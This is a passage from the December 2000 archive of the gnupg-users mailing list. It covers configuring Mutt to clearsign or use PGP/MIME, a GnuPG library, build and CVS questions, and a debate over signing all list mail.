at 02:36:55PM -0600, Bryan K. Walton wrote: > OK, more research has helped me to understand what I am looking for.=20 > I think what I am wanting to do is send "clearsign" my emails. Now, > if I can only figure out how to get Mutt to do this automatically. mutt usually creates PGP/MIME format mail when using pgp/gpg. This is the best method to use. However, few mailers support it at the moment. mutt also supports the older application/pgp format. Putting: set pgp_create_traditional=3Dask-no in you .muttrc will get mutt to ask you whether you want PGP/MIME or application/pgp, defaulting in this case to PGP/MIME. However, some mailers still get confused by this and think the whole mail is an attachment (since it is of type application/pgp). For sending mail to such people (e.g. Outlook with the PGP plugin) I have two macros which can sign and sign/encrypt the body of an e-mail (bound to S and N respectively). These can be run from the compose screen just before sending the mail. # macros for very broken mailers that want pgp data as text/plain macro compose S "Fgpg --no-verbose --clearsign --armor\ny" "GPG sign as text/plain" macro compose N "Fgpg --no-verbose -v -o - --encrypt --sign --textmode --armor --always-trust\ny" "GPG encrypt as text/plain" These work, but are a bit of a cludge compared to mutt's proper PGP support. Has anybody got a better version of these? HTH, Andrew --=20 Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ --ikeVEW9yuYc//A+q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6N+zt/LupyPLe7TYRAnK5AJ98TmfskBNDBYlpftfNx4BY0DFV5QCeP8dX 0YJzI0YhwPNQk/W+oWkWP1w= =SSvC -----END PGP SIGNATURE----- --ikeVEW9yuYc//A+q-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 13 23:16:46 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 13 Dec 2000 23:16:46 GMT Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213214101.A264@mcdonald.org.uk> References: <20001213143655.B31330@berbee.com> <20001213214101.A264@mcdonald.org.uk> Message-ID: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Andrew McDonald, On 13 December 2000, I received the following message from you regarding "question regarding gnupg in my regular signature" AM> These work, but are a bit of a cludge compared to mutt's proper PGP AM> support. This implies Mutt invokes PGP "properly" by PGP/MIME and earlier in your posting you referred to "broken mailers" that clearsigned text. Under Linux, the de facto standard *may* be the way in which Mutt defaults for the use of PGP, but in Windows most PGP compliant MUAs *do not* default to PGP/MIME and neither PGP nor GnuPG have any inherant PGP/MIME capability. So what might be "proper" in one environment certainly is not necessarily "proper" in another. I grant you that *if* you are going to send a message from one environment by PGP/MIME that message must be able to be verified and decrypted in another environment, or it will be applications under each OS talking to themselves. There is a standard, RFC2015, but under Windows there are only one or two MUAs to my knowledge which support this. For this reason it is better to clearsign messages to overcome this. Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 13 December 2000 23:06:27 -----BEGIN PGP SIGNATURE----- Version: PGPB2 version 0.01.3 iQA/AwUBOjgDVS7i2PqZ2xC9EQIGowCdHPwHei6Kb8YrqpMFuuRIYHm88M0An04j AtTKH8rpG8UvgYrfjTpw1DFb =1yW5 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From les@mail.dmalabs.com Wed Dec 13 23:51:26 2000 From: les@mail.dmalabs.com (les) Date: Wed, 13 Dec 2000 15:51:26 -0800 Subject: is there a libgnupg Message-ID: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> Hello, I am not on the list, so if you could cc me it would be much appreciated. I am just wondering if there is a library for gnupg that developers could use within their own programs? thank you les vanexel -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 08:24:11 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 09:24:11 +0100 Subject: is there a libgnupg In-Reply-To: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com>; from les@mail.dmalabs.com on Wed, Dec 13, 2000 at 03:51:26PM -0800 References: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> Message-ID: <20001214092411.J21969@gnupg.de> On Wed, 13 Dec 2000, les wrote: > Hello, I am not on the list, so if you could cc me it would be much > appreciated. I am just wondering if there is a library for gnupg that > developers could use within their own programs? ftp://ftp.guug.de/pub/gcrypt/alpha/gpgme or see http://cvs.guug.de Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Thu Dec 14 08:39:33 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Thu, 14 Dec 2000 09:39:33 +0100 (CET) Subject: is there a libgnupg In-Reply-To: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> References: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> Message-ID: <14904.34629.752054.648326@barber.fmi.uni-passau.de> >>>"l" == les writes: l> Hello, I am not on the list, so if you could cc me it would be much l> appreciated. I am just wondering if there is a library for gnupg that l> developers could use within their own programs? You should have looked at the FAQ before posting. Question 4.15 is for you. Regards, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 10:09:15 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 11:09:15 +0100 Subject: Error message In-Reply-To: <3A379D2A168.3FA1RICH@mail.dreamscape.com>; from rich@cnylug.org on Wed, Dec 13, 2000 at 11:00:42AM -0500 References: <3A379D2A168.3FA1RICH@mail.dreamscape.com> Message-ID: <20001214110915.L21969@gnupg.de> On Wed, 13 Dec 2000, Rich wrote: > gpg: can't mmap pool of 16384 bytes: Invalid argument - using malloc mmap(2) can't allocate memory for some reason the memory allocator falls back using malloc. No problem under Windows, becuase there is no such thing as locked memory. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From daniele@ripe.net Thu Dec 14 10:58:28 2000 From: daniele@ripe.net (Daniele Arena) Date: Thu, 14 Dec 2000 11:58:28 +0100 (CET) Subject: --ignore-crc-error (Was: Re: GnuPG fails to import some PGP keys) In-Reply-To: <20001019181338.P20744@gnupg.de> Message-ID: Hi Werner, I just came back on my original key-loading problem after almost two months; you said you would implement the option "--ignore-crc-error", but I just checked out gnupg from CVS and didn't find it. Am I just dumb or did you change your mind? Cheers, Daniele. On Thu, 19 Oct 2000, Werner Koch wrote: > > > The CRC does make sense to protect against transmission errors but > > > there is no cryptograhic reason why it is needed. Two solutions: > > > > > > a) Write a utility to regenerate the CRC > > > b) Implement --ignore-crc-error in gpg > > > > > > Probably you want me to implement solution b - should not be a > > > problem. > > > > If you could implement the b), that would be great. > > Done - will show up in the CVS soon. -------------------------------------------------------------------------- Daniele Arena RIPE NCC - Database Group phone : +31 20 535 4444 Singel 258 fax : +31 20 535 4445 1016AB Amsterdam e-mail : daniele@ripe.net The Netherlands -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 11:09:21 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 12:09:21 +0100 Subject: --ignore-crc-error (Was: Re: GnuPG fails to import some PGP keys) In-Reply-To: ; from daniele@ripe.net on Thu, Dec 14, 2000 at 11:58:28AM +0100 References: <20001019181338.P20744@gnupg.de> Message-ID: <20001214120921.O21969@gnupg.de> Hi! On Thu, 14 Dec 2000, Daniele Arena wrote: > months; you said you would implement the option "--ignore-crc-error", but > I just checked out gnupg from CVS and didn't find it. Am I just dumb or > did you change your mind? You probably checked out the head revision which is the development branch and not all new stuff from stable have been froward-fported. Do a fresh checkout: cvs -d ... checkout -r STABLE-BRANCH-1-0 gnupg or have a look a ftp.gnupg.org/pub/gcrypt/devel/gnupg-1.0.4b.tar.gz Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From daniele@ripe.net Thu Dec 14 12:08:34 2000 From: daniele@ripe.net (Daniele Arena) Date: Thu, 14 Dec 2000 13:08:34 +0100 (CET) Subject: --ignore-crc-error (Was: Re: GnuPG fails to import some PGP keys) In-Reply-To: <20001214120921.O21969@gnupg.de> Message-ID: On Thu, 14 Dec 2000, Werner Koch wrote: > You probably checked out the head revision which is the development > branch and not all new stuff from stable have been froward-fported. > Do a fresh checkout: > > cvs -d ... checkout -r STABLE-BRANCH-1-0 gnupg > > or have a look a ftp.gnupg.org/pub/gcrypt/devel/gnupg-1.0.4b.tar.gz OK, so I'm dumb.:) Thanks a lot! Cheers, Daniele. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From nneul@umr.edu Thu Dec 14 14:28:46 2000 From: nneul@umr.edu (Nathan Neulinger) Date: Thu, 14 Dec 2000 08:28:46 -0600 Subject: bug - HP/UX 10.20 compile of gnupg fails Message-ID: <3A38D91D.4B96286C@umr.edu> If I build without --disable-asm, it give errors about invalid syscalls when running gpg. If I build with --disable-asm, it gets a undefined symbol __udiv_qrnnd at link time. It built just fine on HP/UX 11.00. This occurs with HP's C compiler as well as gcc (2.96 20000712). -- Nathan ------------------------------------------------------------ Nathan Neulinger EMail: nneul@umr.edu University of Missouri - Rolla Phone: (573) 341-4841 Computing Services Fax: (573) 341-4216 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Thu Dec 14 15:25:06 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Thu, 14 Dec 2000 09:25:06 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213133740.A31330@berbee.com>; from bryan@bryansweb.com on Wed, Dec 13, 2000 at 01:37:41PM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> Message-ID: <20001214092506.B7654@berbee.com> Hi, I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. Now, I what I would like to do is configure Mut so that it will clearsign automatically. I know there is a way to autosign in PGP/MIME format. But I am having trouble getting it to autosign in clearsign format. I am using Mutt 1.2.5i. I tried adding "set pgp_create_traditional=yes" to my .muttrc but that didn't work. I am also sending this message to the mutt-users list. Thanks! Bryan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From walton@berbee.com Thu Dec 14 15:30:03 2000 From: walton@berbee.com (walton@berbee.com) Date: Thu, 14 Dec 2000 09:30:03 -0600 Subject: Question regarding clearsigning emails automatically Message-ID: <20001214093003.C7654@berbee.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. Now, I what I would like to do is configure Mut so that it will clearsign automatically. I know there is a way to autosign in PGP/MIME format. But I am having trouble getting it to autosign in clearsign format. I am using Mutt 1.2.5i. I tried adding "set pgp_create_traditional=yes" to my .muttrc but that didn't work. I am also sending this message to the mutt-users list. Thanks! Bryan -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjo453gACgkQ+bU2CMlTTuqx7gCgroT9Fe3a7u4yTbxVn6kOVJd4 iXMAn1T4zpSzWy56qx+lmKPt12Kvjh+V =QBJq -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Thu Dec 14 15:38:27 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Thu, 14 Dec 2000 09:38:27 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214092506.B7654@berbee.com>; from bryan@bryansweb.com on Thu, Dec 14, 2000 at 09:25:06AM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> <20001214092506.B7654@berbee.com> Message-ID: <20001214093827.E7654@berbee.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 OK, So I forgot to clearsign the previous message. All the more reason why I want to automate this part of the process. Thanks, Bryan On Thu, Dec 14, 2000 at 09:25:06AM -0600, Bryan K. Walton wrote: > Hi, > I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. > Now, I what I would like to do is configure Mut so that it will clearsign automatically. I know there is a way to autosign in PGP/MIME format. But I am having trouble getting it to autosign in clearsign format. I am using Mutt 1.2.5i. I tried adding "set pgp_create_traditional=yes" to my .muttrc but that didn't work. I am also sending this message to the mutt-users list. > > Thanks! > Bryan > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org - -- Bryan K. Walton Network Operations Center Analyst Berbee 5520 Research Park Drive Madison, Wisconsin 53711 608.288.4000 Berbee...putting the E in business -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjo46WoACgkQ+bU2CMlTTuqQiACdHvFst82vDWiK+kky5sKIZaRz BgUAn1iInOMK99k9ui/+AH05JzTSTMVP =/Xr5 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Thu Dec 14 16:18:17 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Thu, 14 Dec 2000 16:18:17 +0000 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214093003.C7654@berbee.com>; from walton@berbee.com on Thu, Dec 14, 2000 at 09:30:03AM -0600 References: <20001214093003.C7654@berbee.com> Message-ID: <20001214161817.B10991@nmrc.ie> walton@berbee.com writes: > Hi, > I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. Please trim your lines to 72-76 chars per line. Thank you. IMHO signing list email is a useless and wasteful exercise, especially if the sender hasn't submitted his/her keys to the public keyservers. In this situation, those who have configured their encrytion software to automatically import keys from these servers are penalised. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dgc@uchicago.edu Thu Dec 14 17:03:13 2000 From: dgc@uchicago.edu (David Champion) Date: Thu, 14 Dec 2000 11:03:13 -0600 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214161817.B10991@nmrc.ie>; from lhecking@nmrc.ie on Thu, Dec 14, 2000 at 04:18:17PM +0000 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> Message-ID: <20001214110313.C1032@smack.uchicago.edu> On 2000.12.14, in <20001214161817.B10991@nmrc.ie>, "Lars Hecking" wrote: > > IMHO signing list email is a useless and wasteful exercise, especially > if the sender hasn't submitted his/her keys to the public keyservers. > In this situation, those who have configured their encrytion software > to automatically import keys from these servers are penalised. This has come up before in my conversation with others. I think that signing all mail as a policy is a waste of resources and a potential source of annoyance, whether it's list mail or not. I think that sensitive material (code patches, or authoritative announcements of new software releases, or analyses of the latest Communications Prohibition Act, and the like) ought to be signed if possible; anyone who is concerned about the validity of the message can check the signature if they like. But, by and large, it doesn't matter. I don't really care whether it was really the person I know as Lars Hecking who wrote the message I'm replying to right now. It only matters what's said in this case, and not much who said it. If I want to confirm all this, I can write to Lars and he can sign it. If I sign my mail to Lars, he'll quite possibly even sign his reply. But chances are exceedingly small that any given item of information really needs to be corroborated. Since PGP became available, I've been asked only a handful of times to resend something with a signature. I'm reluctant to believe that's only because people don't know that I have a signing key. Having the signatures come up, and my mailer and OpenPGP client freeze while I wait to download a signature that might and might not be on the server that I use, only to discover that the signed material doesn't even need validation, is somewhat irritating at times - semi-political privacy agenda or no. -- -D. dgc@uchicago.edu NSIT University of Chicago -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 17:08:48 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 18:08:48 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214161817.B10991@nmrc.ie>; from lhecking@nmrc.ie on Thu, Dec 14, 2000 at 04:18:17PM +0000 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> Message-ID: <20001214180848.K23140@gnupg.de> On Thu, 14 Dec 2000, Lars Hecking wrote: > IMHO signing list email is a useless and wasteful exercise, especially > if the sender hasn't submitted his/her keys to the public keyservers. Well, that depends on the content of the mail. But you are right, for the bulk of ML traffic, there is no need for signing. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 17:24:10 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 18:24:10 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214110313.C1032@smack.uchicago.edu>; from dgc@uchicago.edu on Thu, Dec 14, 2000 at 11:03:13AM -0600 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> Message-ID: <20001214182410.L23140@gnupg.de> On Thu, 14 Dec 2000, David Champion wrote: > Having the signatures come up, and my mailer and OpenPGP client freeze > while I wait to download a signature that might and might not be on the And on a slow box (mine) it even freezes during signature verification. It would be much better if Mutt has an option to check signatures on demand and not every time you open that message. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Thu Dec 14 17:45:37 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Thu, 14 Dec 2000 18:45:37 +0100 (CET) Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214161817.B10991@nmrc.ie> References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> Message-ID: <14905.1857.278559.225569@barber.fmi.uni-passau.de> >>>"LH" == Lars Hecking writes: LH> walton@berbee.com writes: >> Hi, >> I would first like to thank Graham, Brian, and Andrew for their >> responses to my question regarding clearsigning my emails. As you >> can see, this message is clearsigned. LH> IMHO signing list email is a useless and wasteful exercise, especially ... I fail to see why anyone would want to automatically sign all mails. The act of signing means something like "I have read/written the above. I agree with this. To certify this fact, I hereby sign it." That means: signing has to be a conscious act. If it's done automatically, it's not conscious and the signature loses its meaning ... Just my thoughts, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Thu Dec 14 17:48:31 2000 From: evangelo@pigdog.org (ESP) Date: 14 Dec 2000 09:48:31 -0800 Subject: Question regarding clearsigning emails automatically In-Reply-To: David Champion's message of "Thu, 14 Dec 2000 11:03:13 -0600" References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> Message-ID: <87d7euzyfk.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "DC" == David Champion writes: DC> This has come up before in my conversation with others. I DC> think that signing all mail as a policy is a waste of DC> resources and a potential source of annoyance, whether it's DC> list mail or not. What resources, exactly? Randomness? Or maybe you think the 100-byte overhead per message is too much for the delicate network infrastructure of the Innurnet? DC> I think that sensitive material (code patches, or DC> authoritative announcements of new software releases, or DC> analyses of the latest Communications Prohibition Act, and the DC> like) ought to be signed if possible; anyone who is concerned DC> about the validity of the message can check the signature if DC> they like. One value of signatures that you didn't point out is establishing identity for people who don't meet face to face. When you get an email from me in two months asking for a loan of $10,000, you'll know that it was the same guy who sent a gnupg-users list email in Dec 2000, since the signatures will be the same. Do you need to know who I am now? No. Will you need to know in the future? Maybe. Lastly, that semi-political agenda you mentioned? It's worthwhile. Making signatures and encryption a part of everyday usage is valuable. ~ESP - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6OQflbZezvPSYodkRAuGSAJ0Yr7/6LVsLTIpvXF5Zt4MHms/i9gCeOzS1 fej+QdYYDeqrL67qMFUOKVE= =sL6H -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ccurley@trib.com Thu Dec 14 18:05:58 2000 From: ccurley@trib.com (Charles Curley) Date: Thu, 14 Dec 2000 11:05:58 -0700 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 06:24:10PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> <20001214182410.L23140@gnupg.de> Message-ID: <20001214110558.A20973@trib.com> --9jxsPFA5p3P2qPhR Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Dec 14, 2000 at 06:24:10PM +0100, Werner Koch muttered: > On Thu, 14 Dec 2000, David Champion wrote: >=20 > > Having the signatures come up, and my mailer and OpenPGP client freeze > > while I wait to download a signature that might and might not be on the >=20 > And on a slow box (mine) it even freezes during signature > verification. It would be much better if Mutt has an option to check > signatures on demand and not every time you open that message. Try: set pgp_verify_sig=3Dask-yes --=20 -- C^2 No windows were crashed in the making of this email. Looking for fine software and/or web pages? http://w3.trib.com/~ccurley --9jxsPFA5p3P2qPhR Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OQwG//ZMSE7N39sRAm4YAJ9pBkGHc/eT9WphWRQbzsELp9+q0QCgm74r mlvESaUR383fPs43kWPNPDQ= =CzDA -----END PGP SIGNATURE----- --9jxsPFA5p3P2qPhR-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Thu Dec 14 18:54:08 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Thu, 14 Dec 2000 18:54:08 +0000 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214182410.L23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 06:24:10PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214110313.C1032@smack.uchicago.edu> <20001214182410.L23140@gnupg.de> Message-ID: <20001214185408.A688@mcdonald.org.uk> On Thu, Dec 14, 2000 at 06:24:10PM +0100, Werner Koch wrote: > On Thu, 14 Dec 2000, David Champion wrote: > > > Having the signatures come up, and my mailer and OpenPGP client > > freeze while I wait to download a signature that might and might > > not be on the > > And on a slow box (mine) it even freezes during signature > verification. It would be much better if Mutt has an option to check > signatures on demand and not every time you open that message. This extract is from the mutt manual. Doesn't this do what you want? 6.3.113. pgp_verify_sig Type: quadoption Default: yes If "Yes", always attempt to verify PGP/MIME signatures. If "Ask", ask whether or not to verify the signature. If "No", never attempt to verify PGP/MIME signatures. Andrew -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Thu Dec 14 19:02:58 2000 From: rich@cnylug.org (Rich) Date: Thu, 14 Dec 2000 14:02:58 -0500 Subject: majordomo? Message-ID: <3A391962208.0E19RICH@mail.dreamscape.com> Is majordomo@gnupg.org working? Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Thu Dec 14 19:05:38 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Thu, 14 Dec 2000 19:05:38 +0000 Subject: majordomo? In-Reply-To: <3A391962208.0E19RICH@mail.dreamscape.com>; from rich@cnylug.org on Thu, Dec 14, 2000 at 02:02:58PM -0500 References: <3A391962208.0E19RICH@mail.dreamscape.com> Message-ID: <20001214190538.C11831@nmrc.ie> Rich writes: > Is majordomo@gnupg.org working? IIRC this list doesn't run on majordomo. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Thu Dec 14 19:10:17 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Thu, 14 Dec 2000 19:10:17 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Wed, Dec 13, 2000 at 11:16:46PM +0000 References: <20001213143655.B31330@berbee.com> <20001213214101.A264@mcdonald.org.uk> <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001214191017.B688@mcdonald.org.uk> On Wed, Dec 13, 2000 at 11:16:46PM +0000, Graham wrote: > AM> These work, but are a bit of a cludge compared to mutt's proper PGP > AM> support. > This implies Mutt invokes PGP "properly" by PGP/MIME and earlier in > your posting you referred to "broken mailers" that clearsigned text. PGP/MIME has advantages over the older application/pgp format, and it would be nice to see it supported by all the mailers that offer "pgp support". The pgp/mime standard in rfc2015 is 4 years old, and lots of MUAs seem to support S/MIME. :) RFC 2440, does after all say: "An application that implements OpenPGP for messaging SHOULD implement OpenPGP-MIME." (See RFC2119 for the meaning of 'SHOULD'). "broken mailers" really referred to Microsoft Outlook, which I get annoyed with for many reasons (and, yes, I do use it at work :( ). That particular comment in my .muttrc came about after getting frustrated trying to send a message to an Outlook user that they could easily decrypt/verify. This process involved PGP/MIME, then application/pgp and finally this macro which implements application/pgp-but-the-content-type-says-text/plain. This, however, is probably due to problems trying to plug PGP support into Outlook. :-) By terming my macros "a bit of a cludge". I meant that mutt's PGP/MIME support was so nice, easy and clean to use; using these macros seem very horrible in comparison. :( Andrew -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Thu Dec 14 19:36:33 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Thu, 14 Dec 2000 19:36:33 GMT Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214191017.B688@mcdonald.org.uk> References: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> <20001214191017.B688@mcdonald.org.uk> Message-ID: <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Andrew McDonald, On 14 December 2000, I received the following message from you regarding "question regarding gnupg in my regular signature" AM> On Wed, Dec 13, 2000 at 11:16:46PM +0000, Graham wrote: AM> > AM> These work, but are a bit of a cludge compared to mutt's proper PGP AM> > AM> support. AM> AM> > This implies Mutt invokes PGP "properly" by PGP/MIME and earlier in AM> > your posting you referred to "broken mailers" that clearsigned text. AM> AM> PGP/MIME has advantages over the older application/pgp format, and it AM> would be nice to see it supported by all the mailers that offer "pgp AM> support". The pgp/mime standard in rfc2015 is 4 years old, and lots of AM> MUAs seem to support S/MIME. :) AM> RFC 2440, does after all say: "An application that implements OpenPGP AM> for messaging SHOULD implement OpenPGP-MIME." (See RFC2119 for the AM> meaning of 'SHOULD'). You're probably right, but specifically what advantages? AM> "broken mailers" really referred to Microsoft Outlook, which I get AM> annoyed with for many reasons (and, yes, I do use it at work :( ). Same here! AM>That AM> particular comment in my .muttrc came about after getting frustrated AM> trying to send a message to an Outlook user that they could easily AM> decrypt/verify. This process involved PGP/MIME, then application/pgp AM> and finally this macro which implements AM> application/pgp-but-the-content-type-says-text/plain. This, however, is AM> probably due to problems trying to plug PGP support into Outlook. :-) PGP has a plug-in which integrates more seamlessly with Outlook than Eudora or Outlook Express. The problem I would think is that you're trying to get a MUA (Mutt) which defaults to PGP/MIME under Linux, to produce something which can be understood by a Windows application (Outlook) for which there is no PGP/MIME support. Despite somebody telling me that this difference is not an OS problem, but an application problem, most Windows MUAs do not have PGP/MIME support if they have PGP. AM> By terming my macros "a bit of a cludge". I meant that mutt's PGP/MIME AM> support was so nice, easy and clean to use; using these macros seem AM> very horrible in comparison. :( I understand that, but for we Windows users, PGP/MIME 